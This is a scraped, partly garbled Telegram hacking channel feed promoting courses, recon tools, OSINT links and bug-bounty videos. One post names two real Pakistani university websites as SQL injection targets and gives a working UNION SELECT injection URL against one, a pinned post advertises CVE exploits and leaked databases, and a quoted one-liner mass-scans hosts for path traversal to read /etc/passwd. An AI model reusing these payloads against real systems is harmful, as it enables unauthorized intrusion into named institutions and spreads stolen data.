This channel/community aims to provide free courses related to programming,web development, cyber security, ethical hacking and many more tech related stuff and news #programmming, #coding, #ethicalhacking #cybersecurity
Join our channel channel :- telegram.me/cybertrickzone
@cybertrickzone for more to learn hacking, programming, hacking tools, pdf , courses, tech news, database daily updates. Please join my channel
Join our channel channel :- telegram.me/cybertrickzone
@cybertrickzone for more to learn hacking, programming, hacking tools, pdf , courses, tech news, database daily updates. Please join my channel
Telegram
CYBER TRICKS ZONE ๐ฎ๐ณ
This channel/community aims to provide free courses related to programming,web development, cyber security, ethical hacking and many more tech related stuff and news #programmming, #coding, #ethicalhacking #cybersecurity. About : @about_cybertrickszone
Another Part of SQL Injection๐ฅ
๐ฆ๐ค๐ ๐๐ป๐ท๐ฒ๐ฐ๐๐ถ๐ผ๐ป ๐๐๐๐ต ๐๐๐ฝ๐ฎ๐๐
๐ง๐ผ๐ฝ๐ถ๐ฐ๐ ๐๐ผ๐๐ฒ๐ฟ๐ฒ๐ฑ:
๐ญ. Authentication Basics
๐ฎ. Code Review of the Vulnerability๐จ
๐ฏ. Practically Bypassing Authentication with SQL Vulnerability.
๐ฃ๐น๐ฒ๐ฎ๐๐ฒ ๐๐ถ๐ธ๐ฒ & ๐ฆ๐๐ฏ๐๐ฐ๐ฟ๐ถ๐ฏ๐ฒ ๐๐ผ ๐ผ๐๐ฟ ๐ฌ๐ผ๐๐ง๐๐ฏ๐ฒ ๐ฐ๐ต๐ฎ๐ป๐ป๐ฒ๐น ๐ณ๐ผ๐ฟ ๐ ๐ผ๐ฟ๐ฒ ๐ฆ๐ค๐ ๐ถ๐ป๐ท๐ฒ๐ฐ๐๐ถ๐ผ๐ป ๐ง๐ผ๐ฝ๐ถ๐ฐ. ๐๐ป๐
๐๐ถ๐ป๐ธ:
https://youtu.be/sEfpho_YlzI?si=hvhkvi1Iw-kuc9w4
๐ฆ๐ค๐ ๐๐ป๐ท๐ฒ๐ฐ๐๐ถ๐ผ๐ป ๐๐๐๐ต ๐๐๐ฝ๐ฎ๐๐
๐ง๐ผ๐ฝ๐ถ๐ฐ๐ ๐๐ผ๐๐ฒ๐ฟ๐ฒ๐ฑ:
๐ญ. Authentication Basics
๐ฎ. Code Review of the Vulnerability๐จ
๐ฏ. Practically Bypassing Authentication with SQL Vulnerability.
๐ฃ๐น๐ฒ๐ฎ๐๐ฒ ๐๐ถ๐ธ๐ฒ & ๐ฆ๐๐ฏ๐๐ฐ๐ฟ๐ถ๐ฏ๐ฒ ๐๐ผ ๐ผ๐๐ฟ ๐ฌ๐ผ๐๐ง๐๐ฏ๐ฒ ๐ฐ๐ต๐ฎ๐ป๐ป๐ฒ๐น ๐ณ๐ผ๐ฟ ๐ ๐ผ๐ฟ๐ฒ ๐ฆ๐ค๐ ๐ถ๐ป๐ท๐ฒ๐ฐ๐๐ถ๐ผ๐ป ๐ง๐ผ๐ฝ๐ถ๐ฐ. ๐๐ป๐
๐๐ถ๐ป๐ธ:
https://youtu.be/sEfpho_YlzI?si=hvhkvi1Iw-kuc9w4
YouTube
26 SQL Injection Auth Bypass
๐๐น๐๐๐ค๐๐ง๐๐๐: https://drive.google.com/drive/folder...
๐ด BE MY FRIEND
๐๐๐ฃ๐จ๐ฉ๐๐๐ง๐๐ข (thecybertix): https://www.instagram.com/thecybertix
๐๐๐ฌ๐๐ฉ๐ฉ๐๐ง: https://twitter.com/thecybertix
๐๐๐๐ฃ๐ ๐๐๐๐ฃ: https://www.linkedin.com/company/cyb
๐๐๐๐๐จ๐๐ฉ๐: https://cybertix.inโฆ
๐ด BE MY FRIEND
๐๐๐ฃ๐จ๐ฉ๐๐๐ง๐๐ข (thecybertix): https://www.instagram.com/thecybertix
๐๐๐ฌ๐๐ฉ๐ฉ๐๐ง: https://twitter.com/thecybertix
๐๐๐๐ฃ๐ ๐๐๐๐ฃ: https://www.linkedin.com/company/cyb
๐๐๐๐๐จ๐๐ฉ๐: https://cybertix.inโฆ
๐ฎ๐ฎ๐ฑ๐ฌ $ ๐๐ผ๐๐ป๐๐ ๐ค
๐๐ผ๐ฟ ๐ฆ๐ฆ๐ฅ๐ ๐ฉ๐๐น๐ป๐ฒ๐ฟ๐ฎ๐ฏ๐น๐ถ๐น๐ถ๐๐
๐ฉ๐ถ๐ฑ๐ฒ๐ผ ๐ฃ๐ผ๐:
https://youtu.be/vtNYj157TUY?si=2BR38wEe5QHuwqUP
๐๐ผ๐ฟ ๐ฆ๐ฆ๐ฅ๐ ๐ฉ๐๐น๐ป๐ฒ๐ฟ๐ฎ๐ฏ๐น๐ถ๐น๐ถ๐๐
๐ฉ๐ถ๐ฑ๐ฒ๐ผ ๐ฃ๐ผ๐:
https://youtu.be/vtNYj157TUY?si=2BR38wEe5QHuwqUP
YouTube
SSRF Vulnerability ๐ฑ | Got Bounty of $2,550 ๐ค
๐๐ฝ๐๐ ๐๐๐ฅ๐๐ง๐: https://hackerone.com/reports/2123113
๐ด TELEGRAM CHANNEL
๐: ๐พ๐๐๐ฃ๐ฃ๐๐ก ๐๐๐ฃ๐ : https://t.me/thecybertix
๐ด BE MY FRIEND
๐๐๐ฃ๐จ๐ฉ๐๐๐ง๐๐ข (thecybertix): https://www.instagram.com/thecybertix
๐๐๐ฌ๐๐ฉ๐ฉ๐๐ง: https://twitter.com/thecybertix
๐๐๐๐ฃ๐ ๐๐๐๐ฃ: httโฆ
๐ด TELEGRAM CHANNEL
๐: ๐พ๐๐๐ฃ๐ฃ๐๐ก ๐๐๐ฃ๐ : https://t.me/thecybertix
๐ด BE MY FRIEND
๐๐๐ฃ๐จ๐ฉ๐๐๐ง๐๐ข (thecybertix): https://www.instagram.com/thecybertix
๐๐๐ฌ๐๐ฉ๐ฉ๐๐ง: https://twitter.com/thecybertix
๐๐๐๐ฃ๐ ๐๐๐๐ฃ: httโฆ
Forwarded from CYBER TRICKS ZONE ๐ฎ๐ณ (๐๐ง๐ค๐ฉ๐ค๐๐ค๐ก ๐๐๐๐ )
GitHub
GitHub - saisathvik1/OSCP-Cheatsheet: OSCP Cheatsheet by Sai Sathvik
OSCP Cheatsheet by Sai Sathvik. Contribute to saisathvik1/OSCP-Cheatsheet development by creating an account on GitHub.
Forwarded from CYBER TRICKS ZONE ๐ฎ๐ณ (๐๐ง๐ค๐ฉ๐ค๐๐ค๐ก ๐๐๐๐ )
AORT - Automated Recon (easy to use)
-
Checks for subdomains, ports, whois, emails, waybackmachine, DNS, and more
-
Repo: github.com/D3Ext/AORT
-
Creator: @D3Ext
-
#cybersecuritytips #infosec #bugbountytips #CTF #recon #CTF #infosec #cybersecuritytips #cybersecurity #bugbounty
-
Checks for subdomains, ports, whois, emails, waybackmachine, DNS, and more
-
Repo: github.com/D3Ext/AORT
-
Creator: @D3Ext
-
#cybersecuritytips #infosec #bugbountytips #CTF #recon #CTF #infosec #cybersecuritytips #cybersecurity #bugbounty
Forwarded from CYBER TRICKS ZONE ๐ฎ๐ณ (๐๐ง๐ค๐ฉ๐ค๐๐ค๐ก ๐๐๐๐ )
GitHub
GitHub - bhavesh-pardhi/Wordlist-Hub: Welcome to the Bug Hunter's Wordlists repository! ๐๐ This repository serves as a comprehensiveโฆ
Welcome to the Bug Hunter's Wordlists repository! ๐๐ This repository serves as a comprehensive collection of essential wordlists utilized by bug hunters, penetration testers, and security e...
Forwarded from CYBER TRICKS ZONE ๐ฎ๐ณ (๐๐ง๐ค๐ฉ๐ค๐๐ค๐ก ๐๐๐๐ )
Forwarded from CYBER TRICKS ZONE ๐ฎ๐ณ (๐๐ง๐ค๐ฉ๐ค๐๐ค๐ก ๐๐๐๐ )
KD6-3.7
#Python tool for getting additional information about ID holders from the following countries:
๐ฆ๐ฑAlbania
๐ง๐ชBelgium
๐ง๐ฆBosnia and Herzegovina
๐ง๐ฌBulgaria
๐จ๐ฟCzech Republic
๐ฉ๐ฐDenmark
๐ช๐ชEstonia
๐ซ๐ฎFinland
๐ซ๐ทFrance
๐ธ๐ฐSlovakia
github.com/duk3r4/KD6-3.7
Contributor @duk3r4
#Python tool for getting additional information about ID holders from the following countries:
๐ฆ๐ฑAlbania
๐ง๐ชBelgium
๐ง๐ฆBosnia and Herzegovina
๐ง๐ฌBulgaria
๐จ๐ฟCzech Republic
๐ฉ๐ฐDenmark
๐ช๐ชEstonia
๐ซ๐ฎFinland
๐ซ๐ทFrance
๐ธ๐ฐSlovakia
github.com/duk3r4/KD6-3.7
Contributor @duk3r4
GitHub
GitHub - duk3r4/KD6-3.7: A tool for extracting additional data from a person's personal identifiers
A tool for extracting additional data from a person's personal identifiers - duk3r4/KD6-3.7
Forwarded from CYBER TRICKS ZONE ๐ฎ๐ณ (๐๐ง๐ค๐ฉ๐ค๐๐ค๐ก ๐๐๐๐ )
OSINT TIP #221 ๐ฝ๏ธ
HeygenLabs - instant AI video translation, using a natural voice clone and authentic speaking style!
looks cool, try it yourself!
@HeyGen_Official
๐ labs.heygen.com/video-translate
Remember OPSEC ๐
tft: @StuartJRitchie ๐
#OSINT #AI #CyberSecurity
HeygenLabs - instant AI video translation, using a natural voice clone and authentic speaking style!
looks cool, try it yourself!
@HeyGen_Official
๐ labs.heygen.com/video-translate
Remember OPSEC ๐
tft: @StuartJRitchie ๐
#OSINT #AI #CyberSecurity
HeyGenLabs
HeyGen Labs
Interactive Avatar, Personalized Video, Expressive Photo Avatar... Cooking up the next AI magic with cutting-edge HeyGen Labs innovation.
Government Graduate College Sahiwal ( PK
UNIVERSITY OF SAHIWAL ( PK
Taregt:
1-http://www.gpgcs.edu.pk/alumni_profile_details.php?alumni_id=7[SQLi]
2-https://www.uosahiwal.edu.pk/press.php?id=2[SQLi]
Demo:
http://www.gpgcs.edu.pk/alumni_profile_details.php?alumni_id=-7+Union+Select+1,2,3,4,database(),6,7,8,9,10,11,version(),13,14,15--+
#hacker_bano_chutiya_nhe โค๏ธ
#pkmc_ontop ๐ฅ
UNIVERSITY OF SAHIWAL ( PK
Taregt:
1-http://www.gpgcs.edu.pk/alumni_profile_details.php?alumni_id=7[SQLi]
2-https://www.uosahiwal.edu.pk/press.php?id=2[SQLi]
Demo:
http://www.gpgcs.edu.pk/alumni_profile_details.php?alumni_id=-7+Union+Select+1,2,3,4,database(),6,7,8,9,10,11,version(),13,14,15--+
#hacker_bano_chutiya_nhe โค๏ธ
#pkmc_ontop ๐ฅ
Forwarded from CYBER TRICKS ZONE ๐ฎ๐ณ (๐๐ง๐ค๐ฉ๐ค๐๐ค๐ก ๐๐๐๐ )
Here are some YouTube videos on hacking beginners to advanced roadmap tutorials:
* [the hackerโs roadmap (how to get started in IT in 2023)](http://www.youtube.com/watch?v=uTAaFExLgwQ) by NetworkChuck
* [How To Become A Hacker In 2023 | Step By Step Guide For Beginners](http://www.youtube.com/watch?v=W6vcd2gJw3Q) by Tech Xpress
* [Introduction to Hacking | How to Start Hacking](http://www.youtube.com/watch?v=SkfxL_We8ro) by PhD Security
* [Ethical Hacking in 15 Hours - 2023 Edition - Learn to Hack! (Part 1)](http://www.youtube.com/watch?v=3FNYvj2U0HM) by The Cyber Mentor
* [How To Become Ethical Hacker In 2023 | Ethical Hacking Roadmap | All About Hacking | Simplilearn](http://www.youtube.com/watch?v=7tWpzMtR5pQ) by Simplilearn
I hope these videos help you on your journey to becoming a hacker!
http://googleusercontent.com/youtube_content/5
* [the hackerโs roadmap (how to get started in IT in 2023)](http://www.youtube.com/watch?v=uTAaFExLgwQ) by NetworkChuck
* [How To Become A Hacker In 2023 | Step By Step Guide For Beginners](http://www.youtube.com/watch?v=W6vcd2gJw3Q) by Tech Xpress
* [Introduction to Hacking | How to Start Hacking](http://www.youtube.com/watch?v=SkfxL_We8ro) by PhD Security
* [Ethical Hacking in 15 Hours - 2023 Edition - Learn to Hack! (Part 1)](http://www.youtube.com/watch?v=3FNYvj2U0HM) by The Cyber Mentor
* [How To Become Ethical Hacker In 2023 | Ethical Hacking Roadmap | All About Hacking | Simplilearn](http://www.youtube.com/watch?v=7tWpzMtR5pQ) by Simplilearn
I hope these videos help you on your journey to becoming a hacker!
http://googleusercontent.com/youtube_content/5
YouTube
the hackerโs roadmap (how to get started in IT in 2023)
Start your IT Path with ITProTV: https://ntck.co/itprotv (30% off FOREVER) *affiliate link
Are you wanting to get started in IT in 2023? Do you want to become a Hacker? A Network Engineer? Cloud Engineer? System Administrator? In this video, NetworkChuckโฆ
Are you wanting to get started in IT in 2023? Do you want to become a Hacker? A Network Engineer? Cloud Engineer? System Administrator? In this video, NetworkChuckโฆ
Forwarded from CYBER TRICKS ZONE ๐ฎ๐ณ (๐๐ง๐ค๐ฉ๐ค๐๐ค๐ก ๐๐๐๐ )
Telegram Search Engine
Search for Channels, Bots & Groups.
xtea.io/ts_en.html
#cybersecurity #infosec #OSINT
Search for Channels, Bots & Groups.
xtea.io/ts_en.html
#cybersecurity #infosec #OSINT
xtea.io
Telegram Search. Find Telegram Channels, Bots & Groups.
Discover Thousands Telegram Channels, Groups and bots easily. List one of your own Telegram join link for free in Telegram group.
Forwarded from CYBER TRICKS ZONE ๐ฎ๐ณ (๐๐ง๐ค๐ฉ๐ค๐๐ค๐ก ๐๐๐๐ )
Top Coding Challenge Websites to improve your skills.
โข LeetCode
๐ leetcode.com
โข Codewars
๐ codewars.com
โข HackerRank
๐ hackerrank.com
โข CodeChef
๐ codechef.com
โข iCodeThis
๐ icodethis.com
โข Frontend Mentor
๐ frontendmentor.io
โข playCSS
๐ playcss.app
โข Coderbyte
๐ coderbyte.com
โข CodinGame
๐ codingame.com
โข LeetCode
๐ leetcode.com
โข Codewars
๐ codewars.com
โข HackerRank
๐ hackerrank.com
โข CodeChef
๐ codechef.com
โข iCodeThis
๐ icodethis.com
โข Frontend Mentor
๐ frontendmentor.io
โข playCSS
๐ playcss.app
โข Coderbyte
๐ coderbyte.com
โข CodinGame
๐ codingame.com
๐ธBlack Wallpaper HD Background App Data Leak : Download
๐ชฌPlayTube CVE-2023-4714 Exploit : Check
๐ธPaperCut NG CVE-2023-4568 Exploit : Check
๐Prestashop CVE-2023-39677 Exploit : Check
๐Microsoft SharePoint: CVE-2023-29357 Exploit : Check
๐ฒCisco CVE-2023-20209 Exploit : Check
๐ฏElasticsearch Exploit-CVE-2023-31419 : Check
๐ช Chinese Maoxin Database Leak : Download
๐พ๐NSA Equation Group Hacking Tools Leaked : Download
๐ชฌPlayTube CVE-2023-4714 Exploit : Check
๐ธPaperCut NG CVE-2023-4568 Exploit : Check
๐Prestashop CVE-2023-39677 Exploit : Check
๐Microsoft SharePoint: CVE-2023-29357 Exploit : Check
๐ฒCisco CVE-2023-20209 Exploit : Check
๐ฏElasticsearch Exploit-CVE-2023-31419 : Check
๐ช Chinese Maoxin Database Leak : Download
๐พ๐NSA Equation Group Hacking Tools Leaked : Download
CrackCodes ๐ฎ๐ณ pinned ยซ๐ธBlack Wallpaper HD Background App Data Leak : Download ๐ชฌPlayTube CVE-2023-4714 Exploit : Check ๐ธPaperCut NG CVE-2023-4568 Exploit : Check ๐Prestashop CVE-2023-39677 Exploit : Check ๐Microsoft SharePoint: CVE-2023-29357 Exploit : Check ๐ฒCisco CVE-2023โฆยป
๐๐ฉ๐-๐ฎ๐ฌ๐ฎ๐ฏ-๐ฌ๐ญ๐ฎ๐ฒ ๐ฃ๐ฟ๐ฒ-๐ฎ๐๐๐ต๐ฒ๐ป๐๐ถ๐ฐ๐ฎ๐๐ถ๐ผ๐ป ๐ฃ๐ฎ๐๐ต ๐๐ฟ๐ฎ๐๐ฒ๐ฟ๐๐ฎ๐น ๐๐๐น๐ป๐ฒ๐ฟ๐ฎ๐ฏ๐ถ๐น๐ถ๐๐ ๐ถ๐ป ๐ฆ๐ ๐๐ญ๐ฌ๐ฌ๐ฌ
๐๐ฅ
Link: https://twitter.com/thecybertix/status/1707268135907475495?t=o2AtY0lW2VPX9s3Qgfgy_g&s=19
๐๐ฅ
Link: https://twitter.com/thecybertix/status/1707268135907475495?t=o2AtY0lW2VPX9s3Qgfgy_g&s=19
X (formerly Twitter)
Cybertix (@thecybertix) on X
CVE-2023-0126 Pre-authentication path traversal vulnerability in SMA1000
One Liner
cat file.txt| while read host do;do curl -sk "http://$host:8443/images//////////////////../../../../../../../../etc/passwd" | grep -i 'root:' && echo $host "is VULN";doneโฆ
One Liner
cat file.txt| while read host do;do curl -sk "http://$host:8443/images//////////////////../../../../../../../../etc/passwd" | grep -i 'root:' && echo $host "is VULN";doneโฆ
Forwarded from CYBER TRICKS ZONE ๐ฎ๐ณ (๐๐ง๐ค๐ฉ๐ค๐๐ค๐ก ๐๐๐๐ )
(FREE) Complete Ethical Hacking Training 15+ Hours by whitesec cyber security consultancy and Trainings.
course topics -
00:00:00 Note follow the Process
00:00:26 Introduction
7:06 Types of Hackers
15:47 what are the key concept of ethical hacking
26:55 Difference Between Blackhat vs whitehat
33:28 What Problem does ethical hackers identify
38:24 limitations of ethical hacking
44:55 Installing Vmware and Downloding kali linux
46:30 Setuping Kali Linux
58:36 What is FootPrinting
1:07:58 What is Passive Information Gathering
1:16:41 What is Active Information Gathering
1:25:30 How to Perform FootPrinting
1:38:26 How to Perform google Hacking
2:17:11 How to Perform Footprinting Through Shodan
2:31:02 Footprinting censys and whois
2:41:20 Website FootPrinting using Wappalyzer and Netcraft
2:53:45 Finding subdomains
3:29:25 Extracting Website Links
3:34:41 Gathering Information of SSL Certificate
3:44:44 Email FootPrinting
3:52:04 What is Network Scanning
4:00:05 Scanning Network Using Nmap
4:11:18 How to Perform enumeration on ftp ssh telnet smtp
4:24:28 Vulnerability Scanning using nmap
4:27:43 Vulnerability scanning on websites
4:32:04 cracking windows passwords
4:45:35 How to Perform Steganography
4:56:57 what is malware
5:20:24 Trojan keylogger ransomware virus practically
5:42:19 social Engineering - Using Premade Web Template for Phishing
5:45:33 Social Engineering Site Cloning
5:48:18 Adapter for wifi hacking
5:49:35 wifi hacking
5:57:06 windows hacking and penetration testing
5:58:07 Introduction to Windows Hacking and Penetration testing and setting up lab
6:17:53 Scanning Network
6:23:32 checking live machines in Network
6:29:00 Scanning OS and about TTL
6:33:25 About Nmap and Open Ports
6:42:38 service version detection and exploits
6:45:30 How to detect firewall
6:47:38 How to Bypass Firewall
6:49:38 About Fragmentation How its work
6:53:33 What is syn scan and How to perform it
7:02:18 How to Perform Nmap Scan using Different ips (Explanation)
7:10:54 (Practical)How to Perform ip spoofing or using Different ips to Perform Nmap Scanning
7:15:36 Enumeration using Nmap(Explanation)
7:24:30 How to Perform Enumeration (Practically)
7:36:58 How to Perform Vulnerability Scanning Using Nmap
7:45:11 About Metasploit
7:56:03 About MSFvenom
8:01:04 65.Generating Encoded Payload Using Metasploit
8:09:28 MSF console setting up Connection
8:19:20 About Privilege Escalation
8:31:43 Examples Of Privilege Escalation
8:36:45 How to Perform Privilege Escalation
8:43:42 About Eternalblue Vulnerability
8:51:48 what is external and internal network
8:56:32 About Eternalblue Vulnerability-2
9:02:16 Exploiting Eternalblue vulnerability
9:12:30 Exploiting Windows 7 and some important commands
9:24:40 setting up Persistence
9:45:48 privilege Escalation in windows 7
9:55:48 privilege Escalation in Windows 10
10:07:32 Persistence in windows 10
10:13:22 how to clear logs from victim machine
10:17:33 what is migration
10:24:14 Dumping windows Hashes
part - 2
0:37 Dumping Windows Hashes From Memory
6:36 Dumping Clear Text Password from windows
14:45 cracking Hashes Using John the ripper
27:43 injecting payload in real Application
36:50 Setting Up shelter
44:01 How to Generate Advance Payload Using Veil Framework
57:56 Compile Veil Python file to exe
1:14:40 How to implement this Attacks in real world
1:22:25 Advance Red team training
1:44:51 Android Hacking and important notice
1:47:34 How to Setup ngrok
1:56:47 Live Android Remote Access
2:02:32 How to Control Android
2:07:38 installing Ngrok in kali Linux
2:09:25 How to Setup Fatrat
2:22:56 Generating Payload using Fatrat
2:34:35 Setting up Rapid Payload and generating payload
2:46:26 Advance android hacking course
3:13:57 Kali Linux hacking
Training Link ๐๐
part - 1 https://youtu.be/w_oxcjPOWos?si=eD8BmJ1Poy54eHda
part - 2 https://youtu.be/kAShcvzb7wU?si=3KbAyfdPCTK430mA
course topics -
00:00:00 Note follow the Process
00:00:26 Introduction
7:06 Types of Hackers
15:47 what are the key concept of ethical hacking
26:55 Difference Between Blackhat vs whitehat
33:28 What Problem does ethical hackers identify
38:24 limitations of ethical hacking
44:55 Installing Vmware and Downloding kali linux
46:30 Setuping Kali Linux
58:36 What is FootPrinting
1:07:58 What is Passive Information Gathering
1:16:41 What is Active Information Gathering
1:25:30 How to Perform FootPrinting
1:38:26 How to Perform google Hacking
2:17:11 How to Perform Footprinting Through Shodan
2:31:02 Footprinting censys and whois
2:41:20 Website FootPrinting using Wappalyzer and Netcraft
2:53:45 Finding subdomains
3:29:25 Extracting Website Links
3:34:41 Gathering Information of SSL Certificate
3:44:44 Email FootPrinting
3:52:04 What is Network Scanning
4:00:05 Scanning Network Using Nmap
4:11:18 How to Perform enumeration on ftp ssh telnet smtp
4:24:28 Vulnerability Scanning using nmap
4:27:43 Vulnerability scanning on websites
4:32:04 cracking windows passwords
4:45:35 How to Perform Steganography
4:56:57 what is malware
5:20:24 Trojan keylogger ransomware virus practically
5:42:19 social Engineering - Using Premade Web Template for Phishing
5:45:33 Social Engineering Site Cloning
5:48:18 Adapter for wifi hacking
5:49:35 wifi hacking
5:57:06 windows hacking and penetration testing
5:58:07 Introduction to Windows Hacking and Penetration testing and setting up lab
6:17:53 Scanning Network
6:23:32 checking live machines in Network
6:29:00 Scanning OS and about TTL
6:33:25 About Nmap and Open Ports
6:42:38 service version detection and exploits
6:45:30 How to detect firewall
6:47:38 How to Bypass Firewall
6:49:38 About Fragmentation How its work
6:53:33 What is syn scan and How to perform it
7:02:18 How to Perform Nmap Scan using Different ips (Explanation)
7:10:54 (Practical)How to Perform ip spoofing or using Different ips to Perform Nmap Scanning
7:15:36 Enumeration using Nmap(Explanation)
7:24:30 How to Perform Enumeration (Practically)
7:36:58 How to Perform Vulnerability Scanning Using Nmap
7:45:11 About Metasploit
7:56:03 About MSFvenom
8:01:04 65.Generating Encoded Payload Using Metasploit
8:09:28 MSF console setting up Connection
8:19:20 About Privilege Escalation
8:31:43 Examples Of Privilege Escalation
8:36:45 How to Perform Privilege Escalation
8:43:42 About Eternalblue Vulnerability
8:51:48 what is external and internal network
8:56:32 About Eternalblue Vulnerability-2
9:02:16 Exploiting Eternalblue vulnerability
9:12:30 Exploiting Windows 7 and some important commands
9:24:40 setting up Persistence
9:45:48 privilege Escalation in windows 7
9:55:48 privilege Escalation in Windows 10
10:07:32 Persistence in windows 10
10:13:22 how to clear logs from victim machine
10:17:33 what is migration
10:24:14 Dumping windows Hashes
part - 2
0:37 Dumping Windows Hashes From Memory
6:36 Dumping Clear Text Password from windows
14:45 cracking Hashes Using John the ripper
27:43 injecting payload in real Application
36:50 Setting Up shelter
44:01 How to Generate Advance Payload Using Veil Framework
57:56 Compile Veil Python file to exe
1:14:40 How to implement this Attacks in real world
1:22:25 Advance Red team training
1:44:51 Android Hacking and important notice
1:47:34 How to Setup ngrok
1:56:47 Live Android Remote Access
2:02:32 How to Control Android
2:07:38 installing Ngrok in kali Linux
2:09:25 How to Setup Fatrat
2:22:56 Generating Payload using Fatrat
2:34:35 Setting up Rapid Payload and generating payload
2:46:26 Advance android hacking course
3:13:57 Kali Linux hacking
Training Link ๐๐
part - 1 https://youtu.be/w_oxcjPOWos?si=eD8BmJ1Poy54eHda
part - 2 https://youtu.be/kAShcvzb7wU?si=3KbAyfdPCTK430mA
YouTube
Complete Ethical hacking course 16 hours | ethical hacking full course with practical | Zero to Hero
free ethical hacking course by whitesec cyber security consultancy pvt ltd.
course content :-
00:00:00 Note follow the Process
00:00:26 Introduction
7:06 Types of Hackers
15:47 what are the key concept of ethical hacking
26:55 Difference Between Blackhatโฆ
course content :-
00:00:00 Note follow the Process
00:00:26 Introduction
7:06 Types of Hackers
15:47 what are the key concept of ethical hacking
26:55 Difference Between Blackhatโฆ
Hey Everyone, you can join our WhatsApp Channel too, just to get some Important and Good Resources
Join us Now: https://whatsapp.com/channel/0029VaA7sQ6KLaHx1kHh533H
Join us Now: https://whatsapp.com/channel/0029VaA7sQ6KLaHx1kHh533H
WhatsApp.com
Cybertix | WhatsApp Channel
Cybertix WhatsApp Channel. This Channel is just for the Cyber Security Resources Sharing and to get some Good Knowledge of Penetration testing from our Community.
If you are new, then please watch our Penetration testing Videos on our YouTube channel:
๐๐ถ๐ป๐ธ:โฆ
If you are new, then please watch our Penetration testing Videos on our YouTube channel:
๐๐ถ๐ป๐ธ:โฆ